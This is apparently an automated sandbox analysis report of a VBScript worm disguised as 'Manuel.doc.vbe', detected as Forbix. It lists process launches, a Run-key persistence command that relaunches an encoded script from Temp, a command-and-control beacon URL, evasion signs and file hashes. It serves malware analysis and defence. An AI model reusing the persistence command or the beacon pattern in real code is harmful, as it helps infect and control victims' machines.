Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Manuel.doc.vbe Virustotal: Detection: 75%
Source: Manuel.doc.vbe Metadefender: Detection: 55%
Source: Manuel.doc.vbe ReversingLabs: Detection: 74%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Manuel.doc.vbe'
Source: unknown Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: unknown Process created: C:\Windows\System32\cmd.exe 'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Binary string: wshom.pdb source: wscript.exe, 00000004.00000002.3148533955.0000000001F70000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148046580.0000000000370000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148147651.0000000000470000.00000002.00000001.sdmp

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\wscript.exe; Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysinfY2X

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: doc.vbe; Static PE information: Manuel.doc.vbe
Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe TID: 2420; Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 2420; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 2328; Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 960; Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 660; Thread sleep time: -600000s >= -30000s
Source: wscript.exe, 00000000.00000002.2070037453.0000000004040000.00000004.00000001.sdmp; Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe; Domain query: realy.mooo.com
Source: C:\Windows\System32\wscript.exe; Network Connect: 127.0.0.2 80
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: wscript.exe, 00000004.00000002.3148247237.0000000000800000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148181873.0000000000850000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148189576.0000000000860000.00000002.00000001.sdmp; Binary or memory string: Program Manager
Source: wscript.exe, 00000004.00000002.3148247237.0000000000800000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148181873.0000000000850000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148189576.0000000000860000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000004.00000002.3148247237.0000000000800000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148181873.0000000000850000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148189576.0000000000860000.00000002.00000001.sdmp; Binary or memory string: !Progman
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 1 | Registry Run Keys / Startup Folder 11 | Process Injection 112 | Masquerading 2 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 21 | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 11 | Virtualization/Sandbox Evasion 1 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 21 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Manuel.doc.vbe | 75% | Virustotal |
Manuel.doc.vbe | 56% | Metadefender |
Manuel.doc.vbe | 74% | ReversingLabs | Script-WScript.Worm.Forbix
Manuel.doc.vbe | 100% | Avira | VBS/Forbix.A

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.%s.comPA | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
realy.mooo.com | 127.0.0.2 | true | false | | high

    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://realy.mooo.com/( | wscript.exe, 00000007.00000002.3148075473.000000000043E000.00000004.00000020.sdmp | false | | high
http://realy.mooo.com/bot/lancer/index.php?cmd=pingAdva | wscript.exe, 00000007.00000002.3148114769.00000000004C7000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148939482.0000000003E90000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | wscript.exe, 00000000.00000002.2070144321.0000000005120000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3149096479.00000000051E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3149114904.0000000005280000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3149109885.0000000005410000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://realy.mooo.com/bot/lancer/index.php?cmd=ping | wscript.exe, 00000004.00000002.3148976708.000000000490E000.00000004.00000001.sdmp, wscript.exe, 00000004.00000002.3148136888.000000000041E000.00000004.00000020.sdmp, wscript.exe, 00000007.00000002.3148926880.000000000393A000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.3148114769.00000000004C7000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148963520.0000000003EB6000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | wscript.exe, 00000000.00000002.2070144321.0000000005120000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3149096479.00000000051E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3149114904.0000000005280000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3149109885.0000000005410000.00000002.00000001.sdmp | false | | high
http://realy.mooo.com | wscript.exe, 00000000.00000003.2068250667.00000000003EC000.00000004.00000001.sdmp | false | | high
http://realy.mooo.com/bot/lancer/index.php?cmd=pingAdvaX%L | wscript.exe, 00000004.00000002.3148203777.00000000004A6000.00000004.00000020.sdmp | false | | high
http://servername/isapibackend.dll | wscript.exe, 00000000.00000002.2068750916.0000000001CE0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3148277604.0000000001C00000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148226103.0000000001C50000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148231089.0000000001C60000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://realy.mooo.com/ | wscript.exe, 00000000.00000003.2068250667.00000000003EC000.00000004.00000001.sdmp, wscript.exe, 00000004.00000002.3148136888.000000000041E000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148055856.00000000002AE000.00000004.00000020.sdmp | false | | high
http://realy.mooo.com/bo | wscript.exe, 0000000A.00000002.3148055856.00000000002AE000.00000004.00000020.sdmp | false | | high

                    Contacted IPs


                    Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious

                    Private

                    IP
                    127.0.0.2

                    General Information

                    Joe Sandbox Version:31.0.0 Emerald
                    Analysis ID:369332
                    Start date:16.03.2021
                    Start time:14:10:08
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 11m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:Manuel.doc.vbe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal80.evad.winVBE@11/1@63/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .vbe
                    Warnings:
                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

Time | Type | Description
14:10:31 | API Interceptor | 12129x Sleep call for process: wscript.exe modified
14:10:32 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysinfY2X C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\SysinfY2X.db
14:10:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysinfY2X C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\SysinfY2X.db

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                    Process:C:\Windows\System32\wscript.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11195
                    Entropy (8bit):5.922750432207415
                    Encrypted:false
                    SSDEEP:192:YoVivS9W9c1+YqNAmzCFFVCcVXowajgUWPeks8B4+0gXoOAcwLP3OUy8y40DXKl8:YK1U9tYHmzCFucVXdOgXPekXBD0wodcP
                    MD5:CC2DB35F43B4A12700C431811A463439
                    SHA1:D838AAF8D656B7D8D0F48D13646E677EAAD35F20
                    SHA-256:FE9C78249937D57AAED2792238CAEEA298E715D9CF261ADD1FBFBAEEAB084D40
                    SHA-512:F5F9DCDEC48624819ECF24CD561C884C4F8496F6A8E766658F3C16D4DCAB342B0043D1BB543C320F5FEC44F5720B4FF642939A1C77CC849FDBE78F715FA0DDDE
                    Malicious:true
                    Reputation:low

                    Static File Info

                    General

                    File type:data
                    Entropy (8bit):5.922750432207415
                    TrID:
                      File name:Manuel.doc.vbe
                      File size:11195
                      MD5:cc2db35f43b4a12700c431811a463439
                      SHA1:d838aaf8d656b7d8d0f48d13646e677eaad35f20
                      SHA256:fe9c78249937d57aaed2792238caeea298e715d9cf261add1fbfbaeeab084d40
                      SHA512:f5f9dcdec48624819ecf24cd561c884c4f8496f6a8e766658f3c16d4dcab342b0043d1bb543c320f5fec44f5720b4ff642939a1c77cc849fdbe78f715fa0ddde
                      SSDEEP:192:YoVivS9W9c1+YqNAmzCFFVCcVXowajgUWPeks8B4+0gXoOAcwLP3OUy8y40DXKl8:YK1U9tYHmzCFucVXdOgXPekXBD0wodcP

                      File Icon

                      Icon Hash:e8d69ece869a9ec4

                      Network Behavior

                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/16/21-14:17:03.038121 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8

                      Network Port Distribution

                      UDP Packets


                      ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Mar 16, 2021 14:17:03.038120985 CET | 192.168.2.22 | 8.8.8.8 | d014 | (Port unreachable) | Destination Unreachable

                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                      Mar 16, 2021 14:15:49.645076990 CET192.168.2.228.8.8.80xe897Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:49.738286972 CET192.168.2.228.8.8.80x8807Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:57.685406923 CET192.168.2.228.8.8.80xd627Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:15:57.786099911 CET192.168.2.228.8.8.80x4ed4Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:45.370919943 CET192.168.2.228.8.8.80x21e1Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:45.429651976 CET192.168.2.228.8.8.80x21e1Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:45.533243895 CET192.168.2.228.8.8.80x6365Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:53.604867935 CET192.168.2.228.8.8.80xdce8Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:53.665371895 CET192.168.2.228.8.8.80xdce8Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:16:53.766989946 CET192.168.2.228.8.8.80x4fe2Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:01.680114985 CET192.168.2.228.8.8.80x52ffStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:01.740818024 CET192.168.2.228.8.8.80x52ffStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:01.832036018 CET192.168.2.228.8.8.80x79ddStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:02.838766098 CET192.168.2.228.8.8.80x79ddStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:49.334805965 CET192.168.2.228.8.8.80x868Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:49.398439884 CET192.168.2.228.8.8.80xac78Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:57.571419954 CET192.168.2.228.8.8.80x774Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:17:57.667422056 CET192.168.2.228.8.8.80xffdcStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:06.706988096 CET192.168.2.228.8.8.80x37deStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:06.767512083 CET192.168.2.228.8.8.80x37deStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:06.851181984 CET192.168.2.228.8.8.80xe07bStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:53.360168934 CET192.168.2.228.8.8.80x77b3Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:53.515721083 CET192.168.2.228.8.8.80x77b3Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:18:53.604624987 CET192.168.2.228.8.8.80x6fffStandard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:01.712400913 CET192.168.2.228.8.8.80x4223Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:01.772929907 CET192.168.2.228.8.8.80x4223Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:01.862140894 CET192.168.2.228.8.8.80x1077Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:10.712254047 CET192.168.2.228.8.8.80x8611Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:10.770631075 CET192.168.2.228.8.8.80x8611Standard query (0)realy.mooo.comA (IP address)IN (0x0001)
                      Mar 16, 2021 14:19:10.868002892 CET192.168.2.228.8.8.80x22aStandard query (0)realy.mooo.comA (IP address)IN (0x0001)

                      DNS Answers


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Memory Usage

                      High Level Behavior Distribution

                      Behavior

                      System Behavior

                      General

                      Start time: 14:10:30
                      Start date: 16/03/2021
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Manuel.doc.vbe'
                      Imagebase: 0xffc50000
                      File size: 168960 bytes
                      MD5 hash: 045451FA238A75305CC26AC982472367
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      General

                      Start time: 14:10:31
                      Start date: 16/03/2021
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: 'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase: 0x49e60000
                      File size: 345088 bytes
                      MD5 hash: 5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      General

                      Start time: 14:10:32
                      Start date: 16/03/2021
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
                      Commandline: wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase: 0xffc50000
                      File size: 168960 bytes
                      MD5 hash: 045451FA238A75305CC26AC982472367
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      General

                      Start time: 14:10:40
                      Start date: 16/03/2021
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: 'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase: 0x4a930000
                      File size: 345088 bytes
                      MD5 hash: 5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      General

                      Start time: 14:10:40
                      Start date: 16/03/2021
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
                      Commandline: wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase: 0xffc50000
                      File size: 168960 bytes
                      MD5 hash: 045451FA238A75305CC26AC982472367
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      General

                      Start time: 14:10:48
                      Start date: 16/03/2021
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: 'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase: 0x4a7c0000
                      File size: 345088 bytes
                      MD5 hash: 5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      General

                      Start time: 14:10:48
                      Start date: 16/03/2021
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
                      Commandline: wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                      Imagebase: 0xffc50000
                      File size: 168960 bytes
                      MD5 hash: 045451FA238A75305CC26AC982472367
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      Disassembly

                      Code Analysis
